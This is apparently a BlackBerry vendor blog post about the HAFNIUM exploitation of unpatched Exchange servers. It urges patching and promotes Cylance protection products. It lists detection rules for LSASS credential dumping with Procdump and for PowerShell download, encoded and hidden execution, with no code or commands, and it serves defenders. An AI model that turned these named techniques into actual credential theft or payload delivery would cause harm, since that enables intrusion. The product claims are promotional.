Early last week Microsoft identified that the state-sponsored threat actor, HAFNIUM, was utilizing patch vulnerabilities in its on-premise Exchange servers to compromise email accounts. Within a number of days, malicious actors beyond HAFNIUM began targeting these unpatched systems, installing additional malware to ensure long-term access to victim environments.
BlackBerry’s Threat Research Team has analyzed the cyber-attack chain and strongly urges customers to follow Microsoft’s advice and update on-premise systems immediately to reduce the risk of potentially affected systems. We also recommend customers download and enable the custom Win Procdump Lsass CredTheft Mitre rule.
BlackBerry also authored a custom rule to identify and mitigate against the techniques utilized by the HAFNIUM group. The new rule is available for customers to download through MyAccount by accessing the HAFNIUM Malware Optics Rules Knowledge Base (KB) article (000075912).
The Good News? CylancePROTECT, CylanceOPTICS, and CylanceGUARD Stop These Attacks.
Our customers can feel confident that our AI-driven security products, as well as our Managed Detection & Response (MDR) solution, are all well-equipped to mitigate the risks posed by threat actors leveraging patch vulnerabilities.
- CylancePROTECT®, our endpoint protection solution, can help shield customers from the HAFNIUM attack. BlackBerry Protect’s PowerShell Script Control will stop commands associated with the exploit. Memory Protection will prevent the dumping of LSASS memory by terminating the tool used in the attack before completion of the memory extraction.
- CylanceOPTICS®, our endpoint detection and response (EDR) solution, can also help mitigate against the attack. BlackBerry recommends the following official Optics rules be activated:
- Powershell Download
- Fileless Powershell Malware
- Powershell Encoded Command
- Hidden Powershell Execution
- CylanceGUARD® customers are proactively protected, and our 24/7 MDR solution customers receive:
- Alerts monitored in real-time
- Corrective policies applied while discovering gaps in policy implementation
- Prioritized threat hunting
- The latest threat intelligence for fast-moving threats
Finally, any customers who are concerned that they have been compromised should refer to the Indicators of Compromise section of the Microsoft document, HAFNIUM targeting Exchange Servers with 0-day exploits.
The BlackBerry Incident Response team can work with organizations of any size and across any vertical, to evaluate and enhance their endpoint security posture and proactively maintain the security, integrity, and resilience of their network infrastructure. For emergency assistance, please email us at DLIR@blackberry.com, or use our handraiser form.
Learn more about the latest cybersecurity threats and threat actors in the BlackBerry 2021 Annual Threat Report.